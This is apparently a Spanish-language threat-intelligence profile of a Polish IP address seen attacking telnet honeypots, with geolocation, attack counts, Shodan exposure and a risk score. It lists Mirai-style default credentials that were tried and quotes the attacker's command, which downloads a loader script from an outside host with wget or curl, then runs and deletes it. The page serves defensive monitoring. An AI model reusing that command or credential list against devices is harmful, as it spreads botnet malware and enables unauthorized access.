TROYANOSYVIRUS
Amenaza ActivaMEDIO

92.118.205.122

Pais de Origen🇵🇱 Polonia
Primera Deteccion18/4/2026
Ultima Actividad20/4/2026
ISPBrainStorm Network, Inc
🎯
2,277
Ataques Totales
🔌
1
Puertos
📡
1
Tipos Ataque
🦠
2
Malware

Geolocalizacion

Pais
🇵🇱 Polonia
Ciudad
Warsaw
ASN
AS136258
ISP
BrainStorm Network, Inc

Tipos de Ataque

ssh_telnet_honeypot

Puertos Atacados

23

Malware Asociado

9641be11c9ed0855a453...da41d24f215ed0146853...

Credenciales Intentadas

🔐root/password
67x
🔐root/admin
65x
🔐root/root
65x
🔐root/(vacio)
64x
🔐root/vizxv
9x
🔐root/toor
9x
🔐root/S2fGqNFs
9x
🔐root/xc3511
9x
🔐root/7ujMko0admin
9x
🔐root/123456
9x
🔐root/12345
9x
🔐root/1234
9x
🔐root/OxhlwSG8
9x
🔐root/888888
9x
🔐root/Zte521
9x

Comandos Ejecutados

$cd /tmp || cd /run || cd /var/run || cd /dev/shm; wget https://tg-xxooxx888.8964.mom/loader.sh -O .x 2>/dev/null || curl -s https://tg-xxooxx888.8964.mom/loader.sh -o .x; chmod 777 .x; ./.x telnet; rm -f .x56x
$echo mirai56x

Exposicion segun Shodan InternetDBShodan

Datos de InternetDB, actualizacion no en tiempo real

Puertos
8080
CPEs
cpe:/a:f5:nginx

Evaluacion de Riesgo

50
/100
BajoMedioAltoCritico